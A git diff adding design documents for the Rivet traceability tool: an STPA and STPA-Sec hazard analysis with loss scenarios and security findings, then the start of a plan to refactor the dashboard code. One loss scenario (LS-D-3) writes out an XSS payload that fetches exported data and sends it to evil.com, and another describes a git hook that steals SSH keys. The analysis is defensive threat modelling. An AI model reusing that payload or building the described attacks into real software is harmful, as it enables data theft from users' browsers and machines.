False positive artifact references inflate commit coverage + metrics, creating an illusion of implementation completeness. + + - id: UCA-C-19 + description: > + Core commit analysis fails to extract artifact IDs that use + sub-hazard notation (e.g., "H-1.2") or multi-letter suffixes + (e.g., "UCA-C-10"). + context: > + A commit trailer contains "Refs: H-1.2, UCA-C-10" but the + is_artifact_id() function requires digits-only after the hyphen, + so neither ID is extracted. + hazards: [H-15, H-1] + rationale: > + False negative artifact references create coverage gaps. STPA + artifacts (the most safety-critical) are systematically missed + by the commit traceability engine. + + - id: UCA-C-20 + description: > + Core does not detect circular cross-repo dependencies during + external artifact loading. + context: > + Repo A declares repo B as external, and repo B declares repo A. + The sync process enters an infinite loop or stack overflow. + hazards: [H-11, H-1] + rationale: > + Circular dependencies cause the tool to hang or crash during + sync, preventing any validation from completing. +``` + +**CTRL-CORE — WASM Runtime:** + +```yaml +# Additional core UCAs for WASM adapter runtime + + - id: UCA-C-21 + description: > + Core WASM runtime does not validate that adapter-returned + artifacts correspond to actual records in the source data. + context: > + A WASM adapter returns 500 artifacts from a source file that + contains only 50 records. The additional 450 are fabricated. + hazards: [H-14] + rationale: > + Fabricated artifacts pass schema validation because they + conform to the declared types, but they introduce false + traceability links that inflate coverage. + + - id: UCA-C-22 + description: > + Core WASM runtime does not enforce fuel limits, allowing a + malicious adapter to consume unbounded CPU. + context: > + Fuel metering is configured but a bug in the fuel accounting + allows the adapter to execute indefinitely, causing a denial + of service. + hazards: [H-14] + rationale: > + Denial of service during import blocks all validation and + reporting operations. + + - id: UCA-C-23 + description: > + Core WASM runtime leaks host filesystem paths to the guest + adapter via WASI preopened directories. + context: > + The adapter is given access to the AADL directory via WASI + preopened dirs. The adapter reads files outside the intended + scope by exploiting symlinks or relative paths. + hazards: [H-14, H-17] + rationale: > + Information disclosure of host filesystem structure aids + further attacks. Arbitrary file read enables data exfiltration. +``` + +**CTRL-CORE — Lifecycle / Coverage:** + +```yaml + - id: UCA-C-24 + description: > + Core lifecycle completeness check uses a hardcoded downstream + type map that does not reflect the loaded schema's traceability + rules. + context: > + The lifecycle.rs module hardcodes expected_downstream() mappings + (requirement -> [feature, aadl-component, design-decision]). + A project using the cybersecurity schema has different downstream + expectations (e.g., threat-scenario -> countermeasure) that are + not represented. + hazards: [H-3, H-1] + rationale: > + Lifecycle gap analysis produces false negatives for schemas + other than the dev schema, missing genuine coverage gaps in + cybersecurity and STPA domains. +``` + +**CTRL-CORE — Document Validation:** + +```yaml + - id: UCA-C-25 + description: > + Core document validation only checks [[ID]] references but does + not validate {{artifact:ID}} embed references. + context: > + A document uses {{artifact:NOPE-999}} which renders as a broken + embed card in the dashboard, but validate_documents() does not + check this pattern, so no diagnostic is emitted. + hazards: [H-1, H-3] + rationale: > + Broken artifact embeds in documents are invisible to validation, + producing documents that appear complete but contain broken + references. +``` + +**CTRL-CLI — External Sync:** + +```yaml + - id: UCA-L-6 + description: > + CLI sync command executes git clone against an arbitrary URL from + rivet.yaml without validating the URL or disabling git hooks. + context: > + A developer opens a project with a modified rivet.yaml containing + a malicious git URL. Running `rivet sync` clones the repository, + which includes a post-checkout hook that executes arbitrary code. + hazards: [H-17] + rationale: > + The rivet.yaml file is the trust boundary for external + dependencies. A compromised config file enables arbitrary + code execution on the developer's machine. + + - id: UCA-L-7 + description: > + CLI does not validate rivet.lock file integrity before using + pinned commit SHAs for external sync. + context: > + An attacker modifies rivet.lock to point to a different commit + SHA that contains compromised artifacts. The sync operation + checks out the attacker-controlled commit. + hazards: [H-17, H-14] + rationale: > + The lock file is meant to ensure reproducible baselines. + If it can be tampered with undetected, the baseline guarantee + is void. +``` + +### Step 5: Loss Scenarios + +#### 5a. Loss Scenarios for Existing UCAs Currently Lacking Them + +The following UCAs (UCA-C-10 through UCA-C-17) were identified as having no loss scenarios in `loss-scenarios.yaml`: + +```yaml +# Proposed additions to safety/stpa/loss-scenarios.yaml + + # --- Incremental validation UCAs --- + + - id: LS-C-5 + title: Salsa input query not updated after file write + uca: UCA-C-10 + type: inadequate-process-model + hazards: [H-9, H-1, H-3] + scenario: > + The developer edits an artifact YAML file and saves it to disk. + The salsa database's file-content input query was set when the + file was first read. Because there is no file-watcher or + explicit invalidation call between validation invocations in + the same process (e.g., during `rivet serve`), the salsa + database returns the cached parse result from the old file + contents [UCA-C-10]. The link graph and validation diagnostics + reflect the pre-edit state. The dashboard shows "0 errors" + while the file on disk contains broken links [H-1, H-3]. + process-model-flaw: > + The salsa database believes its file-content input still + matches the on-disk content because no explicit set_file_content() + call was made after the file was modified externally. + causal-factors: + - No file-system watcher to detect external file modifications + - Salsa inputs are set once at load time, not refreshed + - Dashboard reload may not invalidate all salsa inputs + + - id: LS-C-6 + title: Conditional rule evaluation uses cached field values + uca: UCA-C-11 + type: inadequate-process-model + hazards: [H-9, H-1] + scenario: > + A schema defines a conditional rule: "when status == approved, + verification-criteria is required." An artifact has status=draft + and no verification-criteria field. The salsa database caches + the rule evaluation result as "not applicable" (because + status != approved). The developer changes the artifact's status + to "approved" but does not add verification-criteria. Because + the salsa conditional-rule query depends only on the rule + definition (not the artifact's field values), the cached "not + applicable" result is returned [UCA-C-11]. The artifact passes + validation despite missing the required field [H-1]. + process-model-flaw: > + The salsa query for conditional rule evaluation does not track + the artifact's field values as dependencies. It only depends + on the rule definition, so field value changes don't trigger + re-evaluation. + causal-factors: + - Conditional rule query does not declare artifact fields as inputs + - Salsa dependency tracking is opt-in per query + - No test verifies conditional rule re-evaluation after field change + + - id: LS-C-7 + title: Contradictory conditional rules not detected at schema load + uca: UCA-C-12 + type: inadequate-control-algorithm + hazards: [H-10] + scenario: > + A project uses two schema files: the ASPICE schema requires + "verification-method" when status=approved, while a custom overlay + schema forbids "verification-method" when safety-level=QM (to + reduce overhead for non-safety items). An artifact with both + status=approved and safety-level=QM triggers both rules. The + schema merge algorithm does not check for rule conflicts [UCA-C-12]. + The developer sees two contradictory validation errors and disables + one rule via a schema override, undermining the validation system. + causal-factors: + - Schema merge is purely additive (union of all rules) + - No SAT-solver or constraint check for rule compatibility + - Conditional rules lack a priority or override mechanism + + - id: LS-C-8 + title: Incremental validation diverges from full validation after rename + uca: UCA-C-13 + type: inadequate-control-algorithm + hazards: [H-9, H-3] + scenario: > + A developer renames an artifact from REQ-042 to REQ-042a. The + salsa database invalidates the queries for the renamed artifact's + file. However, other artifacts that link to REQ-042 are in + different files whose salsa inputs have not changed. The + incremental validation for those files returns cached "valid" + results that still show links to REQ-042 as resolved [UCA-C-13]. + A full validation would detect the broken links. The dashboard + shows 0 errors while a clean `rivet validate` shows 3 broken + links. + causal-factors: + - Link resolution queries depend on the link graph, not individual files + - Salsa does not track cross-file artifact ID dependencies + - No periodic full-revalidation check is implemented + + - id: LS-C-9 + title: Schema loading races with conditional rule evaluation + uca: UCA-C-14 + type: inadequate-control-algorithm + hazards: [H-9, H-10] + scenario: > + The project loads schemas from three files: common.yaml, + dev.yaml, and custom-overlay.yaml. The salsa query graph allows + conditional rule evaluation to begin as soon as two schemas are + merged (common + dev), before the overlay is loaded. The overlay + adds a conditional rule that restricts certain field combinations. + Artifacts evaluated before the overlay loads pass validation + [UCA-C-14]. After the overlay loads, those same artifacts would + fail. The final validation result depends on evaluation order, + making it non-deterministic. + causal-factors: + - Schema merge is incremental (file-by-file) rather than all-at-once + - No barrier between "all schemas loaded" and "evaluation begins" + - Salsa query ordering is determined by demand, not explicit sequencing + + - id: LS-C-10 + title: Parser extracts registry version instead of git_override commit + uca: UCA-C-15 + type: inadequate-control-algorithm + hazards: [H-11, H-1] + scenario: > + A MODULE.bazel file declares `bazel_dep(name="meld", version="2.0")` + and separately `git_override(module_name="meld", commit="abc123")`. + The parser extracts the bazel_dep declaration and records + meld@2.0. It does not process the git_override because the + function name is not in its recognized set [UCA-C-15]. Cross-repo + validation loads meld@2.0 from the registry cache instead of + the pinned commit abc123. The traceability data comes from the + wrong version of meld, and coverage results are meaningless [H-1]. + causal-factors: + - Parser's function recognition list is incomplete + - git_override is parsed separately from bazel_dep with no linkage + - No test covers the override-applies-to-dep scenario + + - id: LS-C-11 + title: Parser silently skips load() statement containing dependency + uca: UCA-C-16 + type: inadequate-control-algorithm + hazards: [H-11] + scenario: > + A MODULE.bazel file uses `load("@rules_rust//rust:defs.bzl", "rust_library")` + followed by a macro call that declares additional bazel_deps. + The parser does not recognize load() statements and silently + skips the line [UCA-C-16]. The macro-declared dependencies are + invisible to Rivet. Cross-repo links to artifacts in those + repos are reported as broken when they actually exist in the + undiscovered external repos. + causal-factors: + - Starlark load() support is not implemented + - Parser treats unrecognized lines as comments + - No diagnostic emitted for skipped lines + + - id: LS-C-12 + title: Parser swaps keyword argument name and value + uca: UCA-C-17 + type: inadequate-control-algorithm + hazards: [H-11, H-1] + scenario: > + A MODULE.bazel file contains `bazel_dep(version="1.0", name="meld")`. + The parser assumes positional argument order (name first, version + second) rather than parsing keyword arguments [UCA-C-17]. It + extracts name="1.0" and version="meld". The dependency is + recorded with the wrong module name, causing cross-repo + resolution to fail silently or resolve against the wrong repo. + causal-factors: + - Parser uses positional extraction rather than keyword matching + - No unit test for non-standard argument ordering + - CST construction assumes a fixed parameter order + +#### 5b. Loss Scenarios for New UCAs + + - id: LS-D-3 + title: Artifact description XSS via dashboard rendering + uca: UCA-D-3 + type: inadequate-control-algorithm + hazards: [H-13] + scenario: > + A developer creates an artifact with description containing + `<img src=x onerror="fetch('/api/export').then(r=>r.text()).then(d=>fetch('https://evil.com/?data='+btoa(d)))">`. + The dashboard's artifact detail view renders this description + by calling html_escape() on the description string. However, + the html_escape function in document.rs is only called for + markdown inline text, not for the artifact detail view in + serve.rs, which may interpolate the description directly into + HTML. The script executes in the auditor's browser, exfiltrating + the current traceability view [H-13, L-2, L-3]. + causal-factors: + - Multiple rendering paths with inconsistent escaping + - serve.rs generates HTML via string formatting, not a template engine + - No Content-Security-Policy header to mitigate XSS + + - id: LS-C-13 + title: WASM adapter returns fabricated artifacts + uca: UCA-C-21 + type: inadequate-process-model + hazards: [H-14] + scenario: > + A WASM adapter component is loaded from a .wasm file distributed + as a binary. The adapter's import() function is called with a + ReqIF source file containing 50 SpecObjects. The adapter returns + 80 artifacts — the original 50 plus 30 fabricated artifacts with + valid-looking IDs (REQ-051 through REQ-080) that link to + existing requirements, inflating coverage metrics [UCA-C-21]. + The host has no way to verify the count because the source data + format is adapter-specific. Schema validation passes because the + fabricated artifacts have valid types and fields. + process-model-flaw: > + The host trusts that the adapter's output faithfully represents + the source data. There is no independent verification mechanism + because the host cannot parse the adapter-specific source format. + causal-factors: + - WASM adapter output is trusted without independent verification + - No artifact-count or hash-based integrity check on adapter output + - Binary WASM components cannot be source-reviewed by users + + - id: LS-C-14 + title: Commit trailer false positive from non-artifact ID + uca: UCA-C-18 + type: inadequate-control-algorithm + hazards: [H-15] + scenario: > + A commit message contains the trailer "Refs: ISO-26262, MISRA-C2012". + The is_artifact_id() function matches any string with uppercase + prefix + hyphen + digits. "ISO-26262" matches (prefix="ISO", + suffix="26262") and is extracted as an artifact reference [UCA-C-18]. + The store does not contain "ISO-26262", so it is counted as a + broken reference. However, in the commit analysis summary, it + inflates the "linked commits" count because the commit has at + least one artifact reference (even though it's a false positive). + causal-factors: + - is_artifact_id() uses an overly broad pattern + - No validation against the actual artifact store during extraction + - Standard identifiers (ISO numbers, MISRA rules) match the pattern + + - id: LS-L-3 + title: Git clone executes malicious post-checkout hook + uca: UCA-L-6 + type: control-path + hazards: [H-17] + scenario: > + An attacker submits a PR that modifies rivet.yaml to add an + external dependency pointing to a malicious git repository. + The repository contains a .git/hooks/post-checkout script that + exfiltrates SSH keys or modifies local source files. A reviewer + approves the PR without noticing the rivet.yaml change. When + any developer runs `rivet sync`, git clones the malicious repo + and the post-checkout hook executes with the developer's + permissions [UCA-L-6]. + causal-factors: + - rivet.yaml changes are not flagged as security-sensitive in review + - git clone enables hooks by default + - No URL allowlist or domain restriction for external repos + - sync command does not use --config core.hooksPath=/dev/null + + - id: LS-C-15 + title: Lifecycle check misses cybersecurity downstream requirements + uca: UCA-C-24 + type: inadequate-process-model + hazards: [H-3, H-1] + scenario: > + A project uses the cybersecurity schema with threat-scenario, + countermeasure, and cybersecurity-requirement types. The + lifecycle completeness check in lifecycle.rs only knows about + requirement -> [feature, aadl-component, design-decision] + mappings. Cybersecurity requirements have no expected downstream + types in the hardcoded map [UCA-C-24]. The lifecycle gap analysis + reports 0 gaps for cybersecurity requirements, even though none + have countermeasure links. The safety engineer trusts the + lifecycle check and misses genuine coverage gaps. + process-model-flaw: > + The lifecycle module's process model is hardcoded to the dev + schema's traceability chain, not derived from the loaded schema's + traceability rules. It does not know about cybersecurity or STPA + type hierarchies. + causal-factors: + - expected_downstream() is hardcoded, not derived from schema rules + - No test covers lifecycle checks with non-dev schemas + - The module was written for the dev schema and not generalized +``` + +--- + +## Part 2: STPA-Sec Analysis + +### 2.1 Supply Chain Attack: Compromised WASM Adapter + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `wasm_runtime.rs` — `WasmAdapter::call_import()`, `call_render()`, `call_analyze()` | +| **Potential impact** | L-1 (fabricated traceability links), L-3 (data exfiltration via WASI), L-5 (false safety assurance from fabricated coverage) | +| **Existing mitigation** | Fuel metering (1B ops), memory limit (256 MiB), WASI preopened dirs are read-only | +| **Missing mitigation** | (1) No code signing or hash verification of .wasm files before loading. (2) No independent verification of adapter output against source data. (3) No sandboxed filesystem — adapter can read any preopened directory. (4) No audit log of adapter invocations and their inputs/outputs. | +| **Recommended constraint** | SC-16 (validate adapter outputs independently). Add: WASM component hash verification against a trusted manifest. | + +### 2.2 Injection Attack: Malicious Artifact Content (XSS) + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `document.rs` — `render_to_html()`, `resolve_inline()`, `html_escape()`; `serve.rs` — all HTML-generating routes | +| **Potential impact** | L-1 (altered traceability display), L-2 (manipulated audit evidence), L-3 (session/data exfiltration) | +| **Existing mitigation** | `html_escape()` function exists in document.rs and handles `&`, `<`, `>`, `"`. The `parse_markdown_link()` function restricts URLs to http/https/#. | +| **Missing mitigation** | (1) No Content-Security-Policy (CSP) header on the dashboard server. (2) serve.rs generates HTML via `format!()` string interpolation, not a template engine with auto-escaping. Each HTML route must manually remember to escape — a single missed interpolation creates an XSS vector. (3) No automated test that verifies HTML output is properly escaped for adversarial inputs. (4) `{{artifact:ID}}` embed rendering constructs HTML from artifact fields with html_escape, but there's no test for nested injection (e.g., artifact title containing quotes that break out of an HTML attribute). | +| **Recommended constraint** | SC-15 (HTML-escape all content). Add: CSP header (`script-src 'self'`), move to a template engine, add XSS-specific test cases. | + +### 2.3 Data Integrity: YAML File Tampering Bypassing Validation + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | YAML artifact files on disk, `store.rs` — `Store::upsert()`, `store.rs` — `Store::insert()` | +| **Potential impact** | L-1 (corrupted traceability), L-3 (unauthorized modification), L-6 (audit trail gaps) | +| **Existing mitigation** | Git history provides an audit trail. `rivet validate` checks schema conformance and link integrity. CI runs validation as a merge gate. | +| **Missing mitigation** | (1) No file integrity checking between validation and report generation — an attacker who can modify files on disk between `rivet validate` and `rivet serve` (or `rivet stats`) can serve unvalidated data. (2) `Store::upsert()` overwrites artifacts without recording what changed or who changed it. (3) No cryptographic hash of the validated state is stored, so there's no way to detect post-validation tampering. | +| **Recommended constraint** | After validation passes, compute a hash of all artifact content. Report generation must verify the hash has not changed. Alternatively, validation and report generation must share the same in-memory state (currently true for `rivet serve` but not for separate CLI invocations). | + +### 2.4 Information Disclosure: Export Leaking Internal Paths + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `model.rs` — `Artifact.source_file`; `serve.rs` — source view routes; `document.rs` — `Document.source_file` | +| **Potential impact** | L-3 (information disclosure of filesystem structure, usernames, internal paths) | +| **Existing mitigation** | `Artifact.source_file` is `#[serde(skip)]` so it's not serialized in YAML exports. | +| **Missing mitigation** | (1) The dashboard source view (`/source/*`) serves raw file content including full filesystem paths in headers/URLs. An attacker with dashboard access sees the full path (e.g., `/Volumes/Home/username/git/project/safety/stpa/losses.yaml`). (2) Git commit information (author name, email, commit SHA) is displayed in the dashboard and would be included in any HTML export. (3) The `build_version()` function in main.rs embeds git branch, commit, and dirty state into the binary — this is visible in `rivet --version` output and potentially in generated reports. | +| **Recommended constraint** | Dashboard should use relative paths, not absolute filesystem paths. HTML exports should strip or anonymize source_file paths. Build metadata should be configurable (allow stripping in release builds). | + +### 2.5 Denial of Service: Pathological Artifact Graphs + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `links.rs` — `LinkGraph::reachable()`, `LinkGraph::build()`; `serve.rs` — graph visualization routes | +| **Potential impact** | L-4 (engineering productivity loss from hung processes) | +| **Existing mitigation** | `LinkGraph::reachable()` uses a visited-set to prevent infinite loops on cycles. `has_cycles()` uses petgraph's `is_cyclic_directed()`. | +| **Missing mitigation** | (1) `reachable()` uses a `Vec` for the visited set with `contains()` checks, giving O(n^2) performance for large graphs. A project with 10,000+ artifacts could experience significant slowdowns. (2) The dashboard graph visualization route computes ego-subgraphs and Sugiyama layouts. For deeply connected graphs, the layout computation could take minutes, with no timeout. (3) No limit on the number of artifacts or links that can be loaded — a malicious YAML file with millions of entries would exhaust memory. | +| **Recommended constraint** | Switch `reachable()` visited set to `HashSet`. Add a configurable timeout for layout computation. Add a configurable limit on artifact/link count with a diagnostic when exceeded. | + +### 2.6 Configuration Tampering: Modified rivet.yaml + +| Aspect | Detail | +|--------|--------| +| **Attack surface** | `rivet.yaml`, `rivet.lock`; `externals.rs` — `sync_external()`; `lib.rs` — `load_project_config()` | +| **Potential impact** | L-3 (data sovereignty via malicious external repos), L-5 (safety assurance via modified schemas) | +| **Existing mitigation** | rivet.yaml is version-controlled in git. Changes are visible in PR diffs. | +| **Missing mitigation** | (1) No schema pinning — if a schema is loaded from a path (not embedded), an attacker who modifies the schema file can weaken validation rules without changing rivet.yaml. (2) No integrity check on embedded schemas — a modified binary with weakened embedded schemas would pass all validation. (3) `rivet.lock` has no signature or checksum, so it can be modified to point to different commit SHAs without detection. | +| **Recommended constraint** | Embedded schemas should include a hash that is verified at load time. rivet.lock should include content hashes of external repo states. Schema files loaded from disk should be verified against expected hashes if available. | + +--- + +## Part 3: OSLC Lifecycle Lens + +### 3.1 Resource Integrity + +**OSLC concern:** Are artifacts complete and consistent? + +| Check | STPA Coverage | Gap? | +|-------|--------------|------| +| All artifacts have required fields | SC-1 (validate cross-references), validation in validate.rs checks required fields | No | +| All links resolve to valid targets | SC-1, UCA-C-4 (dangling links) | No | +| Schema conformance | SC-4 (semantic compatibility), UCA-C-6 (wrong schema) | No | +| Cross-repo artifact integrity | SC-10 (external artifact existence), H-11 (MODULE.bazel) | No | +| **Document-artifact consistency** | validate_documents() checks [[ID]] refs | **Gap: {{artifact:ID}} embeds not validated (UCA-C-25)** | + +### 3.2 Change Management + +**OSLC concern:** Are changes tracked and auditable? + +| Check | STPA Coverage | Gap? | +|-------|--------------|------| +| All modifications attributed | SC-7 (audit trail), H-7 (unattributed modification) | No | +| Change history preserved | L-6 (audit trail), git commit history | No | +| Commit-artifact traceability | commits.rs, UCA-C-18/C-19 (extraction errors) | Partial — see H-15 | +| **Configuration change tracking** | | **Gap: rivet.yaml and schema file changes are not tracked as artifact-level events. A schema change that weakens a validation rule has no artifact-level audit trail.** | + +### 3.3 Configuration Management + +**OSLC concern:** Are baselines reproducible? + +| Check | STPA Coverage | Gap? | +|-------|--------------|------| +| Deterministic artifact loading | SC-11 (incremental = full), deterministic file ordering | No | +| Reproducible baselines | externals.rs lock/baseline commands, rivet.lock | No | +| Schema versioning | Schema files have version metadata | No | +| **Build reproducibility** | | **Gap: No STPA analysis covers the scenario where the Rivet binary itself is not reproducible (different compiler flags, different embedded schema versions). Two developers running different Rivet versions against the same artifacts could get different validation results. SC-14 partially covers this for formal proofs but not for the tool binary itself.** | + +### 3.4 Quality Management + +**OSLC concern:** Are verification records trustworthy? + +| Check | STPA Coverage | Gap? | +|-------|--------------|------| +| Test results linked to artifacts | results.rs, ResultStore | No | +| Coverage metrics from validated data | SC-3 (coverage from validated data), CC-C-8 | No | +| Report generation gated on validation | SC-6 (compliance reports from verified data), CC-L-2 | No | +| Formal verification of tool correctness | SC-14 (proofs validate implementation), H-12 | No | +| **Dashboard data freshness** | UCA-D-2 (stale metrics) | Partially covered, extended by H-16 | + +--- + +## Part 4: Recommended New YAML Artifacts + +### Priority 1: Immediate (new hazards and constraints) + +1. **Add to `hazards.yaml`:** H-13, H-14, H-15, H-16, H-17, sub-hazards H-13.1, H-13.2 +2. **Add to `system-constraints.yaml`:** SC-15, SC-16, SC-17, SC-18, SC-19 +3. **Add to `control-structure.yaml`:** No new controllers needed yet (the requested CTRL-EXPORT, CTRL-YAML-EDIT, CTRL-SALSA do not exist in the codebase — export.rs, yaml_edit.rs, db.rs are not present on this branch. The analysis covers these concerns under existing controllers.) +4. **Add to `ucas.yaml`:** + - Dashboard: UCA-D-3, UCA-D-4 + - Core: UCA-C-18 through UCA-C-25 + - CLI: UCA-L-6, UCA-L-7 +5. **Add to `controller-constraints.yaml`:** CC-D-3/D-4, CC-C-18 through CC-C-25, CC-L-6/L-7 +6. **Add to `loss-scenarios.yaml`:** LS-C-5 through LS-C-15, LS-D-3, LS-L-3 + +### Priority 2: STPA-Sec artifacts (new) + +Create `safety/stpa/security-constraints.yaml` with: +- SEC-1: CSP header on dashboard +- SEC-2: WASM component hash verification +- SEC-3: Git clone hook disabling for externals +- SEC-4: rivet.lock integrity verification +- SEC-5: Artifact count validation for WASM adapter output +- SEC-6: Path anonymization in exports and dashboard + +### Priority 3: OSLC gap remediation + +- Add a hazard (H-18?) for "Rivet schema change weakens validation without artifact-level audit trail" +- Add a constraint (SC-20?) for "Rivet must record schema version and content hash alongside validation results" +- Add a hazard (H-19?) for "Different Rivet binary versions produce different validation results for the same inputs" +- Add a constraint (SC-21?) for "Rivet must embed its version and schema hashes in all generated reports for reproducibility verification" + +--- + +## Summary of Findings + +| Category | Count | Existing | New | +|----------|-------|----------|-----| +| Losses | 6 | 6 | 0 | +| Hazards | 17 (+2 sub) | 12 (+6 sub) | 5 (+2 sub) | +| System constraints | 19 | 14 | 5 | +| Controllers | 7 | 7 | 0 (requested ones don't exist on this branch) | +| UCAs | 47 | 32 | 15 | +| Controller constraints | 44 | 31 | 13 | +| Loss scenarios | 27 | 13 | 14 | +| STPA-Sec findings | 6 | 0 | 6 | +| OSLC gaps | 3 | 0 | 3 | + +### Critical Findings + +1. **XSS in dashboard** (H-13): The dashboard generates HTML via string formatting in serve.rs. While document.rs has html_escape(), the serve.rs routes may have inconsistent escaping. No CSP header is set. This is the highest-impact security finding because the dashboard is used during audit reviews. + +2. **WASM supply chain** (H-14): WASM adapters are loaded as binary blobs without signature verification. The adapter output is trusted without independent verification. Fuel and memory limits provide DoS protection but not integrity protection. + +3. **Missing loss scenarios** (UCA-C-10 through UCA-C-17): Eight UCAs related to incremental validation and MODULE.bazel parsing had no loss scenarios. These are now covered by LS-C-5 through LS-C-12. + +4. **Commit traceability false positives** (H-15): The `is_artifact_id()` pattern matches standard identifiers like ISO-26262 and MISRA-C2012. STPA artifact IDs (H-1.2, UCA-C-10) are NOT matched. This systematically excludes safety-critical artifacts from commit coverage. + +5. **Lifecycle check hardcoding** (UCA-C-24): The lifecycle completeness check only knows about the dev schema's type hierarchy. Cybersecurity, STPA, and ASPICE schemas are invisible to it. + +6. **Git clone as code execution vector** (H-17): `rivet sync` clones arbitrary git URLs from rivet.yaml without disabling hooks, creating a path from configuration tampering to arbitrary code execution. diff --git a/docs/plans/2026-03-17-dashboard-component-kit.md b/docs/plans/2026-03-17-dashboard-component-kit.md new file mode 100644 index 0000000..6f50160 --- /dev/null +++ b/docs/plans/2026-03-17-dashboard-component-kit.md @@ -0,0 +1,1403 @@ +# Dashboard Component Kit & Scalability Implementation Plan + +> **For agentic workers:** REQUIRED: Use superpowers:subagent-driven-development (if subagents available) or superpowers:executing-plans to implement this plan. Steps use checkbox (`- [ ]`) syntax for tracking. + +**Goal:** Build a reusable UI component system for the dashboard, fix graph scalability, add URL-persisted view state across all views, and add a print-friendly document mode. + +**Architecture:** Extract shared UI primitives (filter bar, sortable table, fold/unfold tree, pagination) into composable Rust helper functions in a new `serve/components.rs` module. Each component renders HTML fragments and emits query-param-aware URLs so all view state survives reload. Graph rendering moves to `spawn_blocking` with a node-count budget and progressive disclosure. A `?print=1` param strips chrome for any view. + +**Tech Stack:** Rust (axum, HTMX), petgraph, etch (Sugiyama layout), inline CSS/JS + +--- + +## File Structure + +| File | Responsibility | +|------|---------------| +| `rivet-cli/src/serve/mod.rs` | Route definitions, AppState, middleware, re-exports | +| `rivet-cli/src/serve/components.rs` | **NEW** — Reusable HTML component functions (filter bar, sortable table, collapsible tree, pagination, graph viewer) | +| `rivet-cli/src/serve/layout.rs` | **NEW** — `page_layout()`, `print_layout()`, CSS constant, context bar | +| `rivet-cli/src/serve/views/mod.rs` | **NEW** — re-export all view handlers | +| `rivet-cli/src/serve/views/index.rs` | **NEW** — `/` and `/stats` | +| `rivet-cli/src/serve/views/artifacts.rs` | **NEW** — `/artifacts`, `/artifacts/{id}`, `/artifacts/{id}/preview` | +| `rivet-cli/src/serve/views/stpa.rs` | **NEW** — `/stpa` with fold/unfold/filter | +| `rivet-cli/src/serve/views/graph.rs` | **NEW** — `/graph`, `/artifacts/{id}/graph` with scalability fixes | +| `rivet-cli/src/serve/views/matrix.rs` | **NEW** — `/matrix`, `/coverage` | +| `rivet-cli/src/serve/views/validate.rs` | **NEW** — `/validate`, `/verification` | +| `rivet-cli/src/serve/views/docs.rs` | **NEW** — `/documents`, `/documents/{id}`, `/doc-linkage` | +| `rivet-cli/src/serve/views/source.rs` | **NEW** — `/source`, `/source/{path}` | +| `rivet-cli/src/serve/views/traceability.rs` | **NEW** — `/traceability`, `/traceability/history` | +| `rivet-cli/src/serve/views/search.rs` | **NEW** — `/search` | +| `rivet-cli/src/serve/views/results.rs` | **NEW** — `/results`, `/results/{run_id}` | +| `rivet-cli/src/serve/views/help.rs` | **NEW** — `/help/*` routes | +| `rivet-cli/src/serve/views/diff.rs` | **NEW** — `/diff` | +| `rivet-cli/src/serve/js.rs` | **NEW** — JavaScript constants: JS (main), SEARCH_JS, AADL_JS | +| `rivet-cli/src/serve/styles.rs` | **NEW** — CSS constant (~580 lines) | +| `etch/src/svg.rs` | MODIFY — dynamic buffer sizing | +| `etch/src/layout.rs` | MODIFY — add node budget / bail-out | +| `safety/stpa/hazards.yaml` | MODIFY — add H-13 (scalability hazard) | +| `safety/stpa/system-constraints.yaml` | MODIFY — add SC-15 (scalability constraint) | + +### Rationale: serve.rs split + +The current `serve.rs` is 7,576 lines — a single file with all routes, CSS, JS, and HTML generation. This plan splits it into a `serve/` module directory. Each view becomes its own file with clear ownership. The `components.rs` module is the key innovation: build filter bars, tables, tree views, and pagination helpers once, then call them from any view. + +**Migration strategy:** Each task extracts one view at a time. The old `serve.rs` shrinks incrementally. At each step, the dashboard remains fully functional. Final step deletes the empty `serve.rs`. + +--- + +## Task 0: STPA scalability coverage + +Add the hazard and constraint for "artifacts grow too large for the dashboard to handle efficiently." + +**Files:** +- Modify: `safety/stpa/hazards.yaml` +- Modify: `safety/stpa/system-constraints.yaml` +- Modify: `safety/stpa/ucas.yaml` +- Modify: `safety/stpa/controller-constraints.yaml` + +- [ ] **Step 1: Add H-13 hazard** + +```yaml + - id: H-13 + title: Rivet dashboard becomes unresponsive when artifact count exceeds layout engine capacity + description: > + When a project contains hundreds or thousands of artifacts, the graph + layout algorithm (O(N² log N) Sugiyama) exhausts memory or blocks the + async runtime, causing the dashboard to hang or crash. Engineers lose + the ability to visualize and navigate traceability, defeating the + tool's purpose. + losses: [L-4, L-5] +``` + +- [ ] **Step 2: Add SC-15 constraint** + +```yaml + - id: SC-15 + title: Dashboard must degrade gracefully when artifact count exceeds rendering thresholds + description: > + The dashboard must impose node budgets on graph layout, paginate + large artifact lists, and progressively disclose detail rather than + attempting to render everything at once. Layout computation must run + outside the async runtime to prevent blocking other requests. + hazards: [H-13] + spec-baseline: "v0.2.0" +``` + +- [ ] **Step 3: Add UCA and CC for dashboard controller** + +Add UCA-D-3 and CC-D-3 to the `dashboard-ucas:` section of `ucas.yaml` (where `UCA-D-1` and `UCA-D-2` already exist): + +```yaml +# In ucas.yaml, dashboard-ucas section: + - id: UCA-D-3 + title: Dashboard provides full unfiltered graph when artifact count exceeds layout budget + uca-type: providing + context: > + Project contains 500+ artifacts and user navigates to /graph without type filters or focus. + controller: CTRL-DASH + hazards: [H-13] + +# In controller-constraints.yaml: + - id: CC-D-3 + constraint: > + Dashboard must enforce a node budget on graph layout, display a helpful + message when exceeded, and provide filter/focus controls to narrow the view. + Layout computation must run in spawn_blocking to avoid blocking the async runtime. + controller: CTRL-DASH + ucas: [UCA-D-3] + hazards: [H-13] +``` + +- [ ] **Step 4: Validate** + +Run: `cargo run --release -- validate` +Expected: PASS (0 warnings) + +- [ ] **Step 5: Commit** + +``` +git add safety/stpa/ +git commit -m "stpa: add H-13/SC-15 scalability hazard for dashboard rendering + +Refs: H-13" +``` + +--- + +## Task 1: Create serve/ module skeleton and extract layout + +Extract `page_layout()`, CSS, and the print layout into the new module structure. This is the foundation everything else builds on. + +**Files:** +- Create: `rivet-cli/src/serve/mod.rs` +- Create: `rivet-cli/src/serve/layout.rs` +- Create: `rivet-cli/src/serve/js.rs` +- Modify: `rivet-cli/src/main.rs` (change `mod serve` to `mod serve` pointing at directory) + +- [ ] **Step 1: Create serve/mod.rs with AppState and router** + +Move `AppState`, `SharedState`, `RepoContext`, `GitInfo`, `SiblingProject` 